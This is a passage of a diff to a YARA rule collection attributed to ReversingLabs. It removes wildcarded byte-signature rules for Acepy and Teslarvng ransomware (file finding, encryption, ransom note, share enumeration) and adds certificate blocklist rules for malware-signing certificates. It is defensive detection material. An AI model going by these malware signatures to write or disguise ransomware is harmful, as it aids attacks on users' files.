-            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D
-            ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D
-            45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8D 0C 41 89 4D ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 8D
-            04 78 89 45 ?? 51 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 45
-        }
-		$find_system_volumes_v2_p1 = {
-            C7 45 ?? ?? ?? ?? ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A
-            ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? 8D 04 41 50 8B C1 8D 4D ?? 50
-            E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8B 4D ?? 3B 4D ?? 74 ?? 6A ?? 56 51 C7 01 ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ??
-            ?? ?? C7 46 ?? ?? ?? ?? ?? C6 06 ?? 83 45 ?? ?? EB ?? 56 51 8D 4D ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 75 ?? 33 C9 89 4D ?? B8 ??
-            ?? ?? ?? 8B 4D ?? 2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 0F 84 ?? ?? ?? ?? 33 DB
-            8D 4D ?? 8D 04 33 89 4D ?? C6 45 ?? ?? 8D 4D ?? 51 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 4D ?? 83 CF ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 83 E7 ?? 89 7D ?? C6 45 ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 3B 35 ?? ?? ?? ?? 74 ??
-            6A ?? 50 56 89 75 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C6
-        }
-		$find_system_volumes_v2_p2 = {
-            45 ?? ?? 8B 45 ?? 89 46 ?? C6 45 ?? ?? 83 05 ?? ?? ?? ?? ?? EB ?? 50 56 B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ??
-            8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 C0 8B 75 ?? 83 C3 ?? FF 45 ?? 2B CE
-            66 89 45 ?? B8 ?? ?? ?? ?? F7 E9 C7 45 ?? ?? ?? ?? ?? C1 FA ?? 8B C2 C7 45 ?? ?? ??
-            ?? ?? C1 E8 ?? 03 C2 39 45 ?? 0F 82 ?? ?? ?? ?? 83 E7 ?? 89 7D ?? C7 45 ?? ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 5F 5B EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 68 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F3
-            0F 7E 05 ?? ?? ?? ?? 8B F0 2B 75 ?? 66 0F D6 45 ?? 90 8B 55 ?? 8B 4D ?? E8 ?? ?? ??
-            ?? 83 3D ?? ?? ?? ?? ?? F2 0F 10 0D ?? ?? ?? ?? F2 0F 59 C1 F2 0F 59 C1 F2 0F 59 C1
-            F2 0F 11 45 ?? 74 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B C8 74 ?? 6A ?? 51 FF 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 0F 57 C0 66 0F 13 05 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F2 0F 10 45 ?? 83 EC ?? F2 0F 11 44 24 ?? 66 0F 6E C6
-            F3 0F E6 C0 C1 EE
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $find_files ) and ( $encrypt_files_v1 ) and ( $cmd_prompt ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $ldap_connect ) and ( $encrypt_files_v2 ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $ldap_connect ) and ( $encrypt_files_v3 ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $encrypt_files_v4 ) and ( $drop_ransom_note_v1 ) and ( all of ( $exclude_from_encryption_v2_p* ) ) ) or ( ( $find_files ) and ( $exclude_from_encryption_v1 ) and ( any of ( $encrypt_files_v5 ) ) and ( all of ( $find_system_volumes_v2_p* ) ) ) or ( ( all of ( $encrypt_files_v5_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( $find_system_volumes ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( $find_files ) ) or ( ( all of ( $encrypt_files_v6_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( $find_files ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Qool Aid, LLC" and pe.signatures [ i ] . serial == "79:03:87:01:84:e1:8a:80:89:97:40:84:5a:15:e2:b2" and 1079654400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Acepy : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5Fba9B373F812C16Aef531D4 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Acepy ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ffb45b1-6bde-5bf8-957e-433b9488ba91"
-		date = "2022-08-04"
-		modified = "2022-08-04"
+		id = "129e981a-064a-5930-bd45-d03ed008451c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Acepy.yara#L1-L69"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "92c543a0b8c3c884f83647119d32c7b46f5fe839694bb8a8de0146c5c77bc587"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15864-L15880"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8b7340359778e3aa56f6ea300973af74eb77efd54108d2ca2b6b8f04d89a1c39"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Acepy"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ??
-            83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? ??
-            83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
-            8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files = {
-            55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 40 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? B8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 39 C8 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            8B 45 ?? 89 C1 40 89 45 ?? EB ?? 8B 45 ?? 8B 4D ?? 01 C1 8B 45 ?? 8B 55 ?? 01 C2 8B
-            45 ?? 50 89 4D ?? 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 31 D2
-            F7 F1 8B 45 ?? 01 D0 8B 4D ?? 0F BE 09 0F BE 10 31 D1 8B 45 ?? 88 08 EB ?? B8 ?? ??
-            ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 B9 ?? ?? ?? ?? 51 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C9 C3
-        }
-		$drop_ransom_note = {
-            55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 50 B8 ?? ?? ?? ?? 50 B8
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
-            ?? ?? C9 C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5f:ba:9b:37:3f:81:2c:16:ae:f5:31:d4" and 1473329076 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_616A5205238590B01D7B761E444E4Ad9 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "09e9e481-c767-53d3-9af1-11dec636cafb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15882-L15898"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "463ccd3ace9021569a7a6d5fcbaadf34b15d2b07baf3df526b271b547cf2bbc5"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $find_files ) and ( $encrypt_files ) and ( $drop_ransom_note ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lerges" and pe.signatures [ i ] . serial == "61:6a:52:05:23:85:90:b0:1d:7b:76:1e:44:4e:4a:d9" and 1421452800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Teslarvng : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_29Be2278113Dd062Eadca32De6B242D0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Teslarvng ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7045b13e-95a5-54da-b540-75d464e7673d"
-		date = "2020-12-14"
-		modified = "2020-12-14"
+		id = "a2dfd6e0-4475-537a-859e-126dd4a02af7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Teslarvng.yara#L1-L137"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "670621aa196a80fbb694e4b1690d7da60e881c5b826133939e61cd6c2406ea98"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15900-L15916"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3df7afba9eda9022a64647ce2a91119d0bdf6fe5b164a1e82b1819409024fbee"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Teslarvng"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A8 ?? 00 00 A1 ?? ?? ?? ?? ?? ?? ?? ?? EC 56 57 50
-            8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? C9 89 4D ?? 89 4D ?? 8B 73 ?? 8B 43 ?? 89 75
-            ?? 89 45 ?? 3B F0 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 8D 04 40 C1 E0 ?? 89 45
-            ?? 8B 04 02 8B 40 ?? 8B 30 3B F0 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 3D ??
-            ?? ?? ?? 10 89 ?? ?? ?? ?? E3 ?? 00 0F 43 05 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? 33 C0
-            83 C9 ?? 66 89 45 ?? 89 4D ?? 8D 4D ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B
-            C7 72 ?? 8B 07 FF 77 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 0F 10 00 0F 11 85
-            ?? ?? ?? ?? F3 0F 7E 40 ?? 83 4D ?? ?? 66 0F D6 45 ?? 66 89 08 8D 8D ?? ?? ?? ?? C7
-            40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 74 ?? 6A ?? 8D 4D ?? 51
-        }
-		$encrypt_files_p2 = {
-            FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
-            8B 41 ?? 89 45 ?? 83 78 ?? ?? 8B 48 ?? 89 4D ?? 72 ?? 8B 00 89 45 ?? C6 45 ?? ?? 33
-            C0 83 4D ?? ?? 8D 4D ?? 66 89 45 ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B 47
-            ?? 72 ?? 8B 3F 50 57 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ??
-            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 6A ?? 8D 45
-            ?? 50 FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? 8B 36 8B 4D ?? 8B 04 02 3B 70 ?? 0F 85 ?? ??
-            ?? ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 3B 75 ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
-            4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D 8B E3 5B C2
-        }
-		$find_files = {
-            FF D6 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 78 ?? ?? 72 ?? 8B 00 B2 ?? 8B C8 E8 ?? ?? ?? ?? C6
-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? 33 C9 8B 85 ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 83 D0 ?? 50 51 FF B5 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B C8 90 66 8B 31 66 3B 32 75 ?? 66 85 F6
-            74 ?? 66 8B 71 ?? 66 3B 72 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 F6 75 ?? 33 C9 EB ?? 1B
-            C9 83 C9 ?? 85 C9 74 ?? B9 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B
-            50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ??
-            85 C0 74 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45
-            ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? FF D6 83 F8 ?? 0F
-            84 ?? ?? ?? ?? FF D6 8B D0
-        }
-		$enum_shares_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D
-            75 ?? 83 7D ?? ?? 6A ?? 0F 43 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 B8 ?? ?? ??
-            ?? 56 66 89 45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 66 89
-            45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D
-            45 ?? 50 57 FF 15 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 89 7D ?? 50
-            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 6A ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ??
-            83 7D ?? ?? 0F 86 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 75 ?? 0F
-            43 4D ?? 03 F1 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 0F 43
-            4D ?? 33 C0 66 89 45 ?? 8B C6 2B C1 89 4D ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? FF 75 ?? 8D 4D ?? 56 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ??
-            ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 66
-        }
-		$enum_shares_p2 = {
-            0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
-            ?? 33 F6 8B 55 ?? 85 D2 0F 84 ?? ?? ?? ?? 33 FF 8B 4D ?? 8B 44 39 ?? 85 C0 74 ?? 3D
-            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 14 39 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 48 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 66
-            8B 08 83 C0 ?? 66 85 C9 75 ?? 2B 45 ?? 8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8B 45 ?? 3B 45 ?? 74 ?? 0F 10 45 ?? C7 40 ?? ?? ?? ?? ?? 0F 11 00 F3 0F 7E 45 ??
-            66 0F D6 40 ?? 33 C0 83 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45
-            ?? EB ?? 8D 4D ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            8B 55 ?? 46 83 C7 ?? 3B F2 0F 82 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 3B 45 ?? 0F 84 ?? ??
-            ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 46 ?? 83 7D ?? ??
-            8B 7D ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 89 45 ?? 83 FF ?? 73 ?? 0F 10 00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11
